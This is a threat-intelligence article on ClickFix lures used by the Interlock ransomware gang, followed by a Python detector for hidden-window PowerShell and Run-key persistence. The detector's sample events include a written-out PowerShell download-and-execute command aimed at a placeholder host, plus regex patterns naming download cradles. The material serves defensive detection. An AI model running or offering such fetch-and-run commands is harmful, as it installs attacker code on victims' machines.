The Rise of ClickFix Attacks: Understanding the Interlock Ransomware Gang

Alex Cipher, 6 min read

The rise of the Interlock ransomware gang has marked a significant shift in the landscape of cyber threats, particularly with their innovative use of ClickFix attacks. These attacks, which gained momentum in mid-2024, exploit social engineering techniques to deceive users into executing malicious commands under the guise of troubleshooting or system maintenance. By impersonating legitimate IT tools, Interlock has successfully infiltrated corporate networks, deploying ransomware through deceptive PowerShell commands. This method not only highlights the gang’s adaptability but also underscores the growing sophistication of cyber adversaries in leveraging human psychology to breach defenses. As organizations grapple with these evolving threats, understanding the mechanics of ClickFix attacks becomes crucial for enhancing cybersecurity resilience.

ClickFix Attacks: A Deceptive Tactic

Evolution of ClickFix Attacks

ClickFix attacks have emerged as a sophisticated form of social engineering, gaining traction among cyber adversaries since mid-2024. The tactic presents fake error messages, CAPTCHA verifications, or system prompts that instruct the user to copy a command and paste it into their own system, typically under the guise of troubleshooting or system maintenance. Imagine a pop-up that looks like a routine system update but actually walks you through running a malicious command yourself; because the victim performs the final step, the payload never has to exploit a software vulnerability to get executed.

The Interlock ransomware gang has been at the forefront of utilizing ClickFix attacks, particularly targeting corporate networks. By impersonating IT tools, they trick victims into executing dangerous PowerShell commands, ultimately leading to the installation of file-encrypting malware. This method has been instrumental in breaching networks and deploying ransomware, showcasing the adaptability and innovation of the Interlock group.

Techniques and Tools Used in ClickFix Attacks

The ClickFix tactic employs a variety of techniques and tools to lure victims. One common method involves using compromised legitimate websites that redirect users to domains hosting fake popup windows. These windows instruct users to paste scripts into a PowerShell terminal, initiating the malware infection process.

Interlock has been known to use fake browser and VPN client updates to install malware, a tactic that has proven effective in deceiving users. Additionally, the group has utilized fake CAPTCHA prompts, hosted on URLs mimicking legitimate portals such as Microsoft Teams and Advanced IP Scanner, to trick users into executing commands on their computers.

Impact and Reach of ClickFix Attacks

ClickFix attacks have had a significant impact, affecting companies across various industries in North America and Europe. The non-specific targeting strategy of the Interlock gang suggests that they are not limited to any particular sector, making them a formidable threat in the cybersecurity landscape.

Sekoia researchers have observed that the Interlock ransomware gang began utilizing ClickFix attacks in January 2025, marking a shift in their tactics. This evolution reflects the broader trend of threat actors adopting ClickFix as a preferred method for initial access and malware deployment.

Persistence and Lateral Movement

Once a system is compromised through a ClickFix attack, the Interlock group employs various techniques to maintain persistence and move laterally within the network. The malicious payload often includes a legitimate copy of the software it pretends to be, alongside an embedded PowerShell script that runs in a hidden window. This script registers a Run key in the Windows Registry for persistence (so the script is re-executed at each logon) and collects system information, including OS version, user privilege level, running processes, and available drives.

The command and control (C2) infrastructure used by Interlock responds with various payloads, including LummaStealer, BerserkStealer, keyloggers, and the Interlock RAT. The latter is a simple trojan that supports file exfiltration, shell command execution, and running malicious DLLs. After the initial compromise, Interlock operators use stolen credentials to move laterally via RDP, with tools like PuTTY, AnyDesk, and LogMeIn facilitating this movement.

Data Exfiltration and Ransom Demands

The final stage of a ClickFix attack involves data exfiltration and ransom demands. Stolen files are uploaded to attacker-controlled Azure Blob Storage, and victims are pressured into paying ransoms ranging from hundreds of thousands to millions of dollars. The Interlock ransomware group maintains a data leak portal on the dark web to increase pressure on victims, threatening to make stolen data public if payments are not made.

The ransom notes used by Interlock have evolved over time, with the latest versions focusing more on the legal aspect of data breaches and the regulatory consequences of public data exposure. This shift in strategy underscores the group’s adaptability and understanding of the psychological pressure points that can compel victims to comply with their demands.

Broader Adoption of ClickFix by Other Threat Actors

While the Interlock ransomware gang has been a prominent user of ClickFix attacks, this tactic has been adopted by a wide range of threat actors, including other ransomware gangs and nation-state actors. Notably, the infamous Lazarus Group, linked to North Korea, has used ClickFix attacks targeting job seekers in the cryptocurrency industry. Similarly, Iran-linked MuddyWater and Russia-linked APT28 have incorporated ClickFix into their cyber espionage campaigns.

The widespread adoption of ClickFix highlights its effectiveness as a social engineering technique. Adversaries have been observed using phishing, malvertising, and SEO poisoning to lure users into visiting ClickFix pages, demonstrating the versatility and adaptability of this tactic in various cyber threat scenarios.

Countermeasures and Mitigation Strategies

To combat the threat posed by ClickFix attacks, organizations must implement robust cybersecurity measures and user education programs. Key strategies include:

  • User Awareness and Training: Educating users about the risks associated with social engineering tactics like ClickFix is crucial. Training programs should focus on recognizing phishing attempts, fake error messages, and other deceptive tactics used by adversaries.

  • Endpoint Protection and Monitoring: Deploying advanced endpoint protection solutions can help detect and block malicious activities associated with ClickFix attacks. Continuous monitoring of network traffic and system logs can also surface behavior indicative of an ongoing attack, such as a PowerShell process launched from the user's desktop session with a hidden window, or a new Run key being registered by that process, which is the persistence step described above.

  • Regular Software Updates and Patching: Keeping software and systems up to date with the latest security patches can mitigate vulnerabilities that adversaries may exploit. Organizations should establish a regular patch management process to ensure timely updates.

  • Network Segmentation and Access Controls: Implementing network segmentation and strict access controls can limit the lateral movement of attackers within a compromised network. This approach reduces the potential impact of a successful ClickFix attack.

  • Incident Response and Recovery Plans: Developing and regularly testing incident response and recovery plans can help organizations respond effectively to ClickFix attacks. These plans should outline procedures for isolating affected systems, restoring data from backups, and communicating with stakeholders.

By adopting a multi-layered approach to cybersecurity, organizations can enhance their resilience against ClickFix attacks and other evolving threats in the digital landscape.
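The persistence chain described earlier (hidden-window PowerShell followed by a Run key registration) is exactly the kind of behavior the monitoring bullet above asks for. The following added example, which is not code from the article or from any vendor, correlates those two stages over constructed Sysmon-style process-creation and registry events; field names follow Sysmon conventions, but every host name, PID, path and URL is a placeholder.

```python
"""Toy ClickFix detector (constructed example, not vendor code). Events are dicts shaped
like Sysmon process-create (EventID 1) and registry-value-set (EventID 13) records."""
import re

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)  # hidden-window flag
CRADLE = re.compile(r"\b(?:iex|invoke-expression|irm|invoke-webrequest|downloadstring)\b", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)  # autostart value written for persistence
INTERACTIVE_PARENTS = {"explorer.exe"}  # launched from the user's shell, not a scheduler/installer

def is_suspicious_launch(ev: dict) -> bool:
    """Stage 1: PowerShell spawned by the desktop shell with a hidden window or download cradle."""
    if ev.get("EventID") != 1 or not ev.get("Image", "").lower().endswith("powershell.exe"):
        return False
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    return parent in INTERACTIVE_PARENTS and bool(HIDDEN_WINDOW.search(cmd) or CRADLE.search(cmd))

def is_run_key_persistence(ev: dict) -> bool:
    """Stage 2: a Run value written by a PowerShell process (the persistence step in the text)."""
    return (ev.get("EventID") == 13 and ev.get("Image", "").lower().endswith("powershell.exe")
            and bool(RUN_KEY.search(ev.get("TargetObject", ""))))

def detect_clickfix_chain(events) -> list:
    """Correlate both stages per (host, pid); one finding per process that did both."""
    launches, findings = {}, []
    for ev in events:
        key = (ev.get("Computer"), ev.get("ProcessId"))
        if is_suspicious_launch(ev):
            launches[key] = ev
        elif is_run_key_persistence(ev) and key in launches:
            findings.append({"host": key[0], "pid": key[1], "run_value": ev["TargetObject"],
                             "command": launches[key]["CommandLine"]})
    return findings

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry; host, PIDs and URL are placeholders
    {"EventID": 1, "Computer": "WS-FIN-07", "ProcessId": 4120, "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://fix.example.invalid/x)"'},
    {"EventID": 13, "Computer": "WS-FIN-07", "ProcessId": 4120, "Image": PS,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"EventID": 1, "Computer": "WS-FIN-07", "ProcessId": 4188, "Image": PS,  # benign admin script
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"[ALERT] {f['host']} pid={f['pid']} persists via {f['run_value']}: {f['command']}")
```

A Run key write on its own is noisy (installers do it constantly), so the detector only alerts when the same process also matched the suspicious launch; in production the correlation key should be the process GUID rather than the reusable PID.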

Final Thoughts

The evolution of ClickFix attacks, particularly by the Interlock ransomware gang, underscores the dynamic nature of cyber threats. As these tactics become more widespread, with adoption by other threat actors like the Lazarus Group and APT28, the need for robust cybersecurity measures becomes ever more pressing. Organizations must prioritize user education, implement advanced endpoint protection, and develop comprehensive incident response plans to mitigate the risks posed by such sophisticated social engineering attacks. By staying informed and proactive, businesses can better defend against the deceptive tactics that characterize the modern cyber threat landscape.
